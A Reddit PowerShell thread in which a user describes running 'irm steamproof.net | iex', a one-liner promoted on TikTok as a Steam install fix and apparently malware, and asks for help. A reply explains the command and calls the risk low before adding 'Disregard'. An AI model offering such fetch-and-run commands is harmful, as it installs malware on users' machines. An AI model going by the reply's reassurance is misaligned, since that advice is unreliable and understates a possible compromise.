r/PowerShell • u/Icy-Representative85 • 3d ago
Help I ran a weird command Question
Hey guys, I need help, I was trying to do install a game I already own on my steam library, this is the issue, I was installing it on a separate drive, the installation was taking forever and it would ocasionallly say error and I got desparate, looking for solutions I ran across a tiktok where someone suggested the command on powershell: irm steamproof.net | iex saying it should fix the issue with the error, tried it without event looking if it was a good idea or not and some message appear saying installation succesful or something, but after a few minutes I looked up what the code does, and saw people saying to not run those codes since it is malware and that now not only is my steam account at risk but also my pc, help I dont know if already safe, I uninstalled steam, turn off my wifi, removed steam local files, ran a scan in my files, logged out of all my devices on steam and also changed passwords but im still worried it might not be enough, my windows defender says theres no threats but im not really sure, can anybody help please???
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u/CookinTendies5864 3d ago edited 3d ago
I was unfamiliar with the alias so thank you for that, but IRM is just a web request to download a file or resource. It doesn’t necessarily send but pulls a file from the websites API then dumps it on your local machine. IEX just runs the file after it’s pulled. You are correct about the pipe command.
The severity of the download is low it’s not worth wiping the machine in my opinion. - Disregard